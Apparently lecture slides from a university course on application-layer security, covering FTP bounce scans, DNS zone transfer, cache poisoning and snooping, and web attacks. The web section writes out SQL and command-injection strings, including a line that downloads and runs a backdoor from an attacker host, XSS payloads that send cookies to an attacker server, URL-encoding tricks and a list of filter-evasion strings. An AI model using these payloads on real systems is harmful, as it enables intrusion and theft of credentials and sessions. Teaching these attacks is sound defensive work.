Application Layer Security

NETE4630 1

Application Layer Security

Lecture 8Supakorn Kungpisdan

[email protected]

Outline

• FTP Security

• DNS Security

• Web Application Security

NETE46302

FTP Security Issues

• All traffic is transmitted in clear text• Weak configuration on FTP allows brute force and

dictionary attacks• Anonymous access may be enabled to FTP server• If file permissions are not set, an anonymous user may

be able to read, overwrite, or delete files, leading to loss of confidentiality, integrity, and availability of data

• If anonymous access is being used on a server, make sure that the proper restrictions are enforced for this user

NETE46303

Active FTP

1. The client connects from a random unprivileged port (N > 1023) to the FTP server's command port, port 21. The client also sends the FTP command PORT N+1 from port N to port 21 at the FTP server. The client then starts listening to port N+1

2. Server returns the response from port 21 to port N at the client

3. The server will then connect back to the client's specified data port from its local data port (port 20) to the client at port N+1

NETE46304

Ref: http://slacksite.com/other/ftp.html

http://slacksite.com/other/ftp.html

Firewall VS Active FTP

• From the server-side firewall's standpoint, to support active mode FTP the following communication channels need to be opened: – FTP server's port 21 from anywhere (Client initiates connection) – FTP server's port 21 to ports > 1023 (Server responds to client's

control port) – FTP server's port 20 to ports > 1023 (Server initiates data

connection to client's data port) – FTP server's port 20 from ports > 1023 (Client sends ACKs to

server's data port)

NETE46305

Active FTP (cont.)

NETE46306

Client port = (14*256)+178 = 3762

debug

Letters in red shows client inputLetters in black shows server output

Active FTP (cont.)

1. The client's command port contacts the server's command port (port 21) and sends the command PORT 1027 (N+1).

2. The server sends an ACK back from its port 21 to the client's command port (port 1026 port N).

3. the server initiates a connection on its local data port (port 20) to the data port the client specified earlier (port 1027).

4. The client sends an ACK back from port 1027 to the server port 20.

NETE46307

Problems of Active FTP

• The FTP client doesn't make the actual connection to the data port of the server

• The FTP client simply tells the server what port it is listening on (N+1) and waits for the server to connect back to the specified port on the client.

• From the client-side firewall, this appears to be an outside system initiating a connection to an internal client– This connection may be blocked

• Because the server initiates the data connection, the server may connects to different client

NETE46308

Passive FTP

• To solve the problem of active FTP, use passive FTP• When opening an FTP connection, the client opens two

random unprivileged ports locally (N>1023 and N+1). • The port N contacts the server on port 21, but instead of

then issuing a PORT command and allowing the server to connect back to its data port, the client will issue the PASV command.

• The server then opens a random unprivileged port (P > 1023) and sends the PORT P command back to the client.

• The client then initiates the connection from port N+1 to port P on the server to transfer data.

NETE46309

Firewall VS Passive FTP

• From the server-side firewall's standpoint, to support passive FTP, the following communication channels need to be opened: – FTP server's port 21 from anywhere (Client initiates connection) – FTP server's port 21 to ports > 1023 (Server responds to client's

control port) – FTP server's ports > 1023 from anywhere (Client initiates data

connection to random port specified by server) – FTP server's ports > 1023 to remote ports > 1023 (Server sends

ACKs (and data) to client's data port)

NETE463010

Passive FTP (cont.)

NETE463011

Server specifies port number

Passive FTP

1. The client contacts the server on the command port (port N=1026) and issues the PASV command.

2. The server then replies with PORT 2024, telling the client which port it is listening to for the data connection.

3. The client then initiates the data connection from its data port (N+1=1027) to the specified server data port (port 2024).

4. The server sends back an ACK (from its port 2024) to the client's data port (port 1027).

NETE463012

You can see that client initiates data connection with FTP server will not be blocked by the firewall

Problems of Passive FTP

• The FTP server needs to allow remote connection to high numbered ports on the server. – Fortunately, many FTP daemons, including the

popular WU-FTPD allow the administrator to specify a range of ports which the FTP server will use.

• Some FTP clients do (or do not) support passive mode.

NETE463013

FTP Bounce Scan

• The FTP bounce attack uses a third workstation to act as a proxy between the nmap host and the destination station.

• With passive FTP, a user could send a PORT command to an FTP server that would direct the data towards a completely different host!

• The FTP bounce attack takes advantage of these poorly-configured FTP servers (no control over ranges of FTP ports)

• The data is BOUNCED from FTP server to target host

NETE463014

FTP Bounce Scan (cont.)

NETE463015

Closed port

Open port

Advantages of FTP Bounce Scan

• FTP bounce attack can scan "through" a firewall. • The FTP bounce attack uses standard FTP functionality.

Nmap does not require specialized packet configurations or changes to the FTP protocol.

• Therefore, the FTP bounce attack does not require any privileged access.

NETE463016

Disadvantages of FTP Bounce Scan

• FTP bounce attack relates to the availability of an FTP server that allows a PORT command to redirect the data connection to a third device.

• Most FTP servers have their default configuration to protect against this use of the PORT command

NETE463017

Other FTP Bounce Attack

• When using active FTP, a client uses the PORT command to specify the IP address and port number that the server should connect to for data connection

• An attacker with access to an FTP server can bounce through the server by specifying someone else’s IP address

NETE463018

Outline

• FTP Security

• DNS Security


NETE463019

Domain Name System

• DNS is a distributed database that holds information for mapping between host names to IP addresses

• DNS uses both UDP and TCP.– UDP is typically used for queries, unless the lookup or response

is greater than 512 bytes– TCP is used for lookups and for zone transfer

• Integrity and availability of DNS is critical for the health of the Internet. It is used in conjunction with almost every other protocol on the Internet

• Availability was considered while designing DNS, however, security was not

NETE463020

DNS Request

NETE463021

DNS Response

NETE463022

DNS Lookup Process

NETE463023

Host A’s Authoritative name server

1. Host A sends a request to resolver (at host A). It checks the local cache and may check hosts file

2. The resolver at Host A forwards the request to its authoritative name server

2

Host A

1

DNS Non-recursive Query

NETE463024


3. Find the address of authoritative name server of the requested domain and returns its address to the resolver

2

Host A

1

3Host B’s

Authoritative name server

Host B4

5

DNS Recursive Query

NETE463025


3. The server finds the address of authoritative name server of the requested domain, passes the request on to the server, and returns a response to the resolver

2

Host A

1

5Host B’s

Authoritative name server

Host B

3

4

DNS Hierarchy (Recursive Query)

NETE463026

43

5

6

.com TLD server

1

2

7

8

1. Recursive query2. non-recursive query

What happens if (2) is recursive query?

DNS Utilities

• Most OSes come with a tool called nslookup, capable of querying DNS servers for various types of information

• The dig tool coming with UNIX has similar capabilities

NETE463027

Name-to-IP Lookup

NETE463028

MX Lookup with nslookup

NETE463029

DNS Security Issues

• DNS is lack of authentication and integrity checking• Due to the lack of authentication, attackers can spoof

DNS messages to perform a variety of attacks• Due to the lack of integrity checking, attackers can

intercept and modify messages in transit

NETE463030

DNS Zone Transfer

• For redundancy, administrators deploy both primary and secondary name servers that contain the same DBs

• To keep the DBs synchronized with the primary name server, the secondary name server periodically connects to the primary name server on port 53/TCP and grabs the DNS records

• This process is called a Zone Transfer

NETE463031

DNS Information Gathering

• DNS can provide a great deal of information about the target network and its hosts

• One of the common insecure configurations with DNS is allowing anyone to perform zone transfers on one of a domain’s DNS servers

• If an attacker can perform a zone transfer with the primary or secondary name servers for a domain, he/she will be able to view all DNS records for that domain

• See a demo at http://www.mindterra.com/blog/?p=179

• Solved by specifying IP address that is allowed to perform the zone transfer or using Transaction Signature (TSIG)

NETE463032

http://www.mindterra.com/blog/?p=179

http://thaicert.nectec.or.th/paper/unix_linux/dns-sec-part1.php

DNS Cache Poisoning

• Both DNS client and servers cache responses for a period of time in order to increase performance and reduce network traffic

• If an attacker can spoof a response for a DNS request, he/she may be able to contaminate the DNS cache with an incorrect record

• This process is known as DNS cache poisoning

• The only real defense built into DNS is the use of a random Transaction ID and source port

• Some versions of BIND use Transaction IDs that are not sufficiently random, and some use sequential Transaction IDs

• BIND 9 Cache Poisoning

NETE463033

http://www.msit2005.mut.ac.th/msit_media/1_2551/NETE4630/Materials/20080718125946yV.pdf

DNS Cache Poisoning (cont.)

1. Attacker sends a large number of recursive requests for www.syngress.com to ns.hackthestack.com

2. ns.hackthestack.com forwards the requests to other name servers until it eventually sends the requests to Syngress’s name server ns.syngress.com

3. The ns.hackthestack.com is expecting to receive a large number of replies from ns.syngress.com.

4. Before they arrive, the attacker could flood ns.hackthestack.com with a large number of packets spoofed from ns.syngress.com

5. The attack will be successful if the spoofed packets have the correct combination of TID and port number

NETE463034

DNS Cache Snooping

• Recursion bit tells the DNS server whether it is recursive or non-recursive query

• The remote DNS server may answer to queries for 3rd party domains which do not have the recursion bit set.

• This may allow a remote attacker to determine which domains have recently been resolved via this name server, and therefore which hosts have been recently visited.

NETE463035

Ref: www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf

http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf

Possible Scenario

• If an attacker was interested in whether your company utilizes the online services of a particular bank, they can use this attack to build a statistical model regarding company usage of the bank mentioned above.

• This attack can also be used to find B2B partners, web-surfing patterns, external mail servers, and more...

• Two techniques are available: using non-recursive queries and using recursive queries

• Some DNS allows both types of queries, but some allows only recursive queries to be made

NETE463036

DNS Cache Snooping with Non-recursive Queries

NETE463037

Attacker queries to ns1.tvcabo.pt for www.sidestep.pt

ns1.tvcabo.pt does not have the entry in local cache. It returns no answer, but gives a list of .pt TLD name server for further question

DNS Cache Snooping with Non-recursive Queries (cont.)

• The fact that ns1.tvcabo.pt does not have the entry in local cache means that all hosts under ns1.tvcabo.pt never communicates with www.sidestep.pt before.

• Thus, this organization does not use services provided by www.sidestep.pt

NETE463038

DNS Cache Snooping with Non-recursive Queries (cont.)

• If the attacker executes the same query, check the response

NETE463039

For this time, ns1.tvcabo.pt caches the entry, so it returns the answer

DNS Cache Snooping with Recursive Queries

• Used to determine with some degree of precision (not 100% sure) whether a given record is present in the cache

• However, this will pollute the cache• If a given record is not present in the cache, it will be

after the first query is made• This is because recursive query will always return the

answer for the given record

NETE463040

DNS Cache Snooping with Recursive Queries

• Try to see if www.sidestep.pt was cached in ns1.tvcabo.pt• Query ns1.tvcabo.pt for www.sidestep.pt and record the TTL

NETE463041

DNS Cache Snooping with Recursive Queries (cont.)

• Then query to ns.sidestep.pt (Sidestep.com’s authoritative DNS) for www.sidestep.com and compare TTL

NETE463042

DNS Cache Snooping with Recursive Queries (cont.)

• TTL for www.sidestep.pt at ns1.tvcabo.pt (6458) is much lower than the initial TTL (86400) (the TTL at ns.sidestep.pt)

• This is a good indicator that the answer was already cached at ns1.tvcabo.pt

• Another way to look for cached responses is to observe the time that the query takes to process.

• If the query time is approximately equal to the round trip time (RTT) of a packet to the server, then the answer might have been already present in the cache.

NETE463043

A Safer BIND Configuration

NETE463044

Outline

• FTP Security

• DNS Security


NETE463045

Attacking Web Applications

• The majority of vulnerabilities are caused by a lack of proper input validation by the application before processing user-supplied data

• This can allow attackers to disclose information about the site, steal information from backend DBs, or execute binary code on the web server

S. Kungpisdan46ITEC5611

SQL Injection

• Many web applications rely on backend DBs for information storage and retrieval.

• Sometimes a script will perform a DB query using input supplied from a web page, without verifying that the input does not contain any escape characters

• Consider the following:

• Query = “SELECT * FROM users WHERE username = ‘{$_POST[‘user’]}’ AND password = ‘{$_POST[‘pass’]}’ ”;

• “SELECT * FROM users WHERE username = ‘bob’ AND password = ‘ ’ OR 1=1 ’’;


Code Injection

• Sometimes user-supplied strings are not properly checked for escape characters before being passed to commands as arguments

• Consider a PHP script that takes a string supplied from web page form and passes it to the nslookup utility


Code Injection (cont.)

• If supply ;ls –la/, the script will execute the command nslookup;ls –la/, resulting in a listing of the root directory being printed out


Code Injection (cont.)

• wget and perl commands could be used to download and run a backdoor on the web server by supplying the following line to the script

• ;wget http://attackersite/backdoor.pl;perl backdoor.pl


Cross-Site Scripting (XSS)

• XSS vulnerabilities allow attackers to inject code or HTML into a web page that will be executed when a different user visits that page

• These attacks target visitors to a web site, not the site itself, and occur when a web page does not properly sanitize user input before using it in output

• Vulnerable websites is possible to execute HTML and JavaScript codes from a not sanitized form

• It's possible to steal cookies or to redirect web pages to build fake login in order to steal login usernames and passwords.


Types of XSS

• DOM-Based XSS • Non-persistent XSS • Persistent XSS

S. Kungpisdan52

Ref: http://www.milw0rm.com/papers/146http://en.wikipedia.org/wiki/Cross_Site_Scripting

ITEC5611

http://www.milw0rm.com/papers/146

http://en.wikipedia.org/wiki/Cross_Site_Scripting

DOM-based XSS

• DOM-based or Type 0 or local XSS vulnerability is based on the standard object model for representing HTML or XML called the Document Object Model or DOM for short.

• The DOM-Based XSS allows to an attacker to work not on a victim website but on a victim local machine

• The attacker tricks an innocent user to visit his/her web site and download a vulnerable web page with embedded malicious script.

• Such script allows the attack gain control over the victim’s machine


Exploit Scenario

1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.

2. Alice clicks on the link.

3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer.

4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone.

5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.


DOM-based XSS (cont.)

• Really dangerous because it operates on the victim system strictly and as long as the user doesn't look after his/her security issues and doesn't apply updates, the DOM-Based XSS will work fine.

• Solution:– Do not visit untrusted website – Keep your system up to date


Non-persistent XSS

• The non-persistent or Type 1 XSS or reflected XSS vulnerability, and is by far the most common type.

• It shows up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user.

• If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page


Non-persistent XSS: Search Engine

• Attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.

• If this happens at 99% the Search engine will execute also JavaScript arbitrary code.


Example

1. Assure that a website works like this: http://www.example.com/search.php?text=TEXTTOSEARCH

2. Try to include some HTML tags in the "text" variable: http://www.example.com/search.php?text=<img src="http://attacker.com/image.jpg">

If the website is vulnerable it will display the attacker's image into the result webpage.


Example (cont.)

3. Try then to write some JavaScript code: http:///www.example.com/search.php?text=<script>alert(document.cookie)</script>

Probably the website will return an alert popup with the current Cookie for the site itself.


Example (cont.)

• This vulnerability can be used by the attacker to steal information to users of the victim website providing them for example an email with an URL like: http://www.victim.com/search.php?text=MALICIOUSCODE

• To make that URL less suspicious it will be useful to encode the code in URL Hex valueFor example the code: <script>alert("XSS")</script> Encoded will look like: %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C %2F%73%63%72%69%70%74%3E


Example (cont.)

• And as comes the malicious url will turn from:

http://www.victim.com/search.php?text=<script>alert("XSS")</script>

Into: http://www.victim.com/search.php?text=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22 %58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E

Which, for a clueless user, it's lot less suspicious than the first one.


Example (cont.)

1. The attacker realizes that the victim website is vulnerable to XSS

2. The attacker creates on his website an ad-hoc page which is used to steal sensible information, e.g. Cookies, or to make a fake login of the victim website.

3. The attacker provides to a user a crafted URL containing a malicious code like:

http://www.victim.com/search.php?text= <script>document.location("http://attackersite.com/fakelogin.php")</script>

Encoded in Hex.

4. The user visits the web page and is obscurely redirect the attacker's fakelogin

5. The user is invited to log into the system and he does.

6. The fake login steals the username and password of the victim.


Persistent XSS

• The persistent XSS is similar to non-persistent XSS – Both works on a victim site and tries to hack user information

• However, attacker doesn't need to provide the crafted URL to the users

• Because the website itself permits to users to insert fixed data into the system– This is the case for example of "guestbooks"

• Usually the users use that kind of tool to leave messages to the owner of the website

• An attacker can insert some malicious code in his message and let ALL visitors to be victim of that.


Exploit Scenario

1. Bob hosts a web site allowing users to post messages and other content to the site for later viewing by other members.

2. Mallory notices that Bob's website is vulnerable to a type 2 XSS attack.

3. Mallory posts a message, controversial in nature, which may encourage many other users of the site to view it.

4. Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to Mallory's web server without their knowledge.

5. Later, Mallory logs in as other site users and posts messages on their behalf....


Exploit Scenario (cont.)

• This works when the tool provided (the guestbook in the example) doesn't do any check on the content of the inserted message: it just inserts the data provided from the user into the result page.

• The attacker could easily insert as much code as he wants into the tool, for example:

<img src="javascript:document.location ('http://attacker.com/steal.php?cookie=' . encodeURI(document.cookie));">

This allows the attacker to steal the cookie of the victim user.


More about XSS

• In order to make the attack less suspicious it's possible to "obfuscate" the IP address of the attacker's website, encoding the IP address with three formats: – Dword Address

– Hex Address

– Octal Address

• For example the IP address 127.0.0.1 will look like: – Dword: 2130706433 – Hex: 0x7f.0x00.0x00.0x01 – Octal: 0177.0000.0000.0001

• Try for example: http://0x7f.0x00.0x00.0x01/ and it will open your localhost web server.


Possible XSS Cheats

• <IMG SRC="javascript:alert('XSS');"> • <IMG SRC=javascript:alert('XSS')> • <IMG

SRC="javascript :alert('PLAYH ACK.NET')">

• <IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"> • <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT> • <<SCRIPT>alert("XSS");//<</SCRIPT> • <iframe src=http://example.com/scriptlet.html < • <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> • <BODY BACKGROUND="javascript:alert('XSS')"> • <BODY ONLOAD=alert(document.cookie)> • <IMG DYNSRC="javascript:alert('XSS')">


Possible XSS Cheats (cont.)

• <IMG DYNSRC="javascript:alert('XSS')"> <BR SIZE="&{alert('XSS')}">

• <IMG SRC='vbscript:msgbox("XSS")'> • <TABLE BACKGROUND="javascript:alert('XSS')"> • <DIV STYLE="width: expression(alert('XSS'));"> • <DIV STYLE="background-image:

url(javascript:alert('XSS'))"> • <STYLE TYPE="text/javascript">alert('XSS');</STYLE> • <STYLE

type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

• <?='<SCRIPT>alert("XSS")</SCRIPT>'?> • <A

HREF="javascript:document.location='http://www.example.com/'">XSS</A>


Information Disclosure

• An error page can discloses the path of the web server’s root directory

• The path disclosure can aid attackers performing reconnaissance on the site

• phpinfo.php, part of a default PHP install, is a script providing the OS and software version on the host and other related information

• Google for inurl:phpinfo.php to see exactly how much information is leaked


NETE4630 70

Question?

Application Layer Security

Documents